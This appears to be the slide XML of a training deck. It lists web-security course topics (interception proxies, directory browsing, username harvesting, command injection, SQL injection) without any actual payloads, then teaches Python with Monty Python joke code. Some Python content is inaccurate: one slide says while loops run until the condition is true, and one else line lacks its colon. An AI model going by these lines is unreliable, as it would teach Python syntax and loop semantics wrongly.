                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>   Verification Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Interception Proxies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Fiddler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> OWASP Zed Attack Proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Burp Suite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Interception Exercise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Information Leakage &amp; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>    Directory Browsing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Directory Browsing Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Username Harvesting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Username Harvesting Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Command Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Command Injection Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Directory Traversal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SQL Injection Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Blind SQL Injection</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a:xfrm>
            <a:off x="685800" y="273050"/>
            <a:ext cx="7775575" cy="903288"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="46800" rIns="90000" bIns="46800"/>
          <a:lstStyle/>
          <a:p>
            <a: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dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Summary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="176131" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="594360" y="1706880"/>
            <a:ext cx="7927975" cy="4116388"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="46800" rIns="90000" bIns="46800"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="339725" indent="-339725" defTabSz="45720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a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Covered the first part of discovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="339725" indent="-339725" defTabSz="45720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a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Started "malicious" traffic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="339725" indent="-339725" defTabSz="45720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a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We will explore further vulnerability discovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="339725" indent="-339725" defTabSz="457200">
              <a:buFontTx/>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dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="339725" indent="-339725" defTabSz="45720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a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Thank you!</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Comments and Code Blocks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Comments can be single line with # or multi-line with """ or '''</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t># I don't want to talk to you no more</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>"""you empty headed animal </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>food trough wiper"""</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>'''Your mother was a hamster</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>                and</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Your father smelt of elderberries'''</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Blocks of code are signaled with a colon followed by indented lines of code (4 space characters is recommended)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>questions = []</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>if location == "Bridge of Death":</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    questions.append('What... is your name?')  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    questions.append('What... is your quest?')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    questions.append('What... is your favorite color?')</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4147440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title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Python If Statement</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13314" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="182208" y="1645920"/>
            <a:ext cx="4562807" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>If…Else Statement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>her = human.object()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>her.witch = False</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>if float(wood) and float(witch):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>    if duck.weight == her.weight:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>        her.witch = True</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>        burn(her)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>else save(her)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13315" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4554538" y="1614170"/>
            <a:ext cx="4648200" cy="411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3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="800100" indent="-342900">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2514600" indent="-2286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pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>No switch/case statement in Python</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>step == 1:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>    build_wooden_rabbit()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>elif step == 2:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>    deliver_rabbit()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>elif step == 3:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>    wait_till_nightfall()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>elif step == 4:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>    take_castle_by_surprise()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>else:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>    build_large_wooden_badger()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="460377869"/>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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Python Looping Structures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11266" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="350847" y="1662359"/>
            <a:ext cx="8458200" cy="36576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3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="800100" indent="-342900">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1257300" indent="-342900">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2514600" indent="-2286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pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>While loops run until test condition is true</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>while blackknight.limbs &gt; 0:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>    if fight(arthur):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>        blackknight.limbs = blackknight.limbs - 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
